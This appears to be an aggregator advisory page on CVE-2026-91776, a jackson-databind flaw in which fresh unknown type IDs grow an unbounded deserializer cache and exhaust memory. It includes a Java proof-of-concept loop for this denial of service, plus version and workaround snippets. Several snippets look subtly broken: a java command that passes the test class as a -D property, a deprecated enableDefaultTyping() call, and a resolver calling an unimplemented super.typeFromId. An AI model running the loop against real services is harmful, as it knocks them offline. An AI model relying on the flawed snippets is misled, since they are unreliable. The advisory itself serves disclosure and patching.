Jackson-databind, Unbounded Type ID Cache Growth, CVE-2026-91776 (Medium) -DC-Sep2026-2677

Listen to this Post

CVE-2026-91776 is a resource management vulnerability in FasterXML jackson-databind’s `TypeDeserializerBase._findDeserializer()` method. The flaw resides in the internal `_deserializers` map, which lacks a configurable bound and persists for the lifetime of the `TypeDeserializer` instance—typically the lifespan of the `ObjectMapper` bean in enterprise applications.
When an application enables name-based polymorphism with a fallback using @JsonTypeInfo(use = Id.NAME, defaultImpl = ...), every distinct unrecognized type ID resolves to the same fallback deserializer. However, jackson-databind caches that resolved deserializer under the raw, attacker-supplied type ID, so each new unknown string becomes a separate key in _deserializers. The map has no size limit, so an attacker who repeatedly supplies fresh unknown type IDs forces the application to allocate new entries without ever evicting them from memory.
The reporter observed 10,000 retained cache entries from 10,000 distinct unknown IDs, against a single retained entry for a control that repeated one unknown ID the same number of times. This isolates attacker-controlled key cardinality from ordinary request count, proving the attack relies on unique ID generation rather than request throughput.
The vulnerability is runtime-confirmed in jackson-databind 2.22.1 and 3.2.1. Patched versions are: 2.18.11, 2.21.7, 2.22.3, 3.1.7, and 3.2.3. The fix stops caching fallback resolutions for unrecognized IDs and bounds both the number of cached entries and the length of a cacheable type ID. The vulnerable application must enable name-based polymorphism with a `defaultImpl` or equivalent fallback, accept attacker-influenced type IDs, and reuse a long-lived mapper across requests.

DailyCVE Form:

Platform: jackson-databind
Version: 2.0-3.2.2
Vulnerability: CVE-2026-91776
Severity: Medium
date: 2026-09-23
Prediction: 2026-12-15

What Undercode Say:

Reproduction: inspect _deserializers growth after 10,000 distinct unknown IDs
java -cp jackson-databind-2.22.1.jar:jackson-core.jar:jackson-annotations.jar \
-Dcom.example.poc.TypeCacheTest
Maven dependency for affected version
<dependency>
<groupId>com.fasterxml.jackson.core</groupId>
<artifactId>jackson-databind</artifactId>
<version>2.22.1</version>
</dependency>
Patched version
<dependency>
<groupId>com.fasterxml.jackson.core</groupId>
<artifactId>jackson-databind</artifactId>
<version>2.22.3</version>
</dependency>

Exploit: (Educational Purposes!)

@JsonTypeInfo(use = JsonTypeInfo.Id.NAME, defaultImpl = Fallback.class)
abstract class Base { }
class Fallback extends Base { }
ObjectMapper mapper = new ObjectMapper();
mapper.enableDefaultTyping();
for (int i = 0; i < 10000; i++) {
String json = "{\"@type\":\"unknown_id_" + i + "\"}";
mapper.readValue(json, Base.class);
}
// Inspect TypeDeserializerBase._deserializers
// Expected: 10000 retained cache entries

Protection:

<!-- Upgrade to patched version -->
<dependency>
<groupId>com.fasterxml.jackson.core</groupId>
<artifactId>jackson-databind</artifactId>
<version>3.2.3</version>
</dependency>
// Workaround: reject unknown type IDs before resolution
public class StrictTypeIdResolver extends TypeIdResolverBase {
@Override
public JavaType typeFromId(DatabindContext context, String id) {
if (!ALLOWED_IDS.contains(id)) {
throw new IllegalArgumentException("Rejected unknown type ID");
}
return super.typeFromId(context, id);
}
}
// Avoid defaultImpl catch-all when possible
@JsonTypeInfo(use = JsonTypeInfo.Id.NAME)
// no defaultImpl — unrecognized IDs fail rather than resolve
abstract class Base { }

Impact:

Denial of service through monotonic process-lifetime memory retention. An attacker submitting a stream of novel unknown type IDs causes incremental memory growth, eventually leading to availability pressure or out-of-memory conditions. No confidentiality, integrity, or code-execution impact is claimed. This is not a single-request allocation spike; no fixed bytes-per-ID or time-to-OOM value is asserted.

🎯Let’s Practice Exploiting & Learn Patching For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top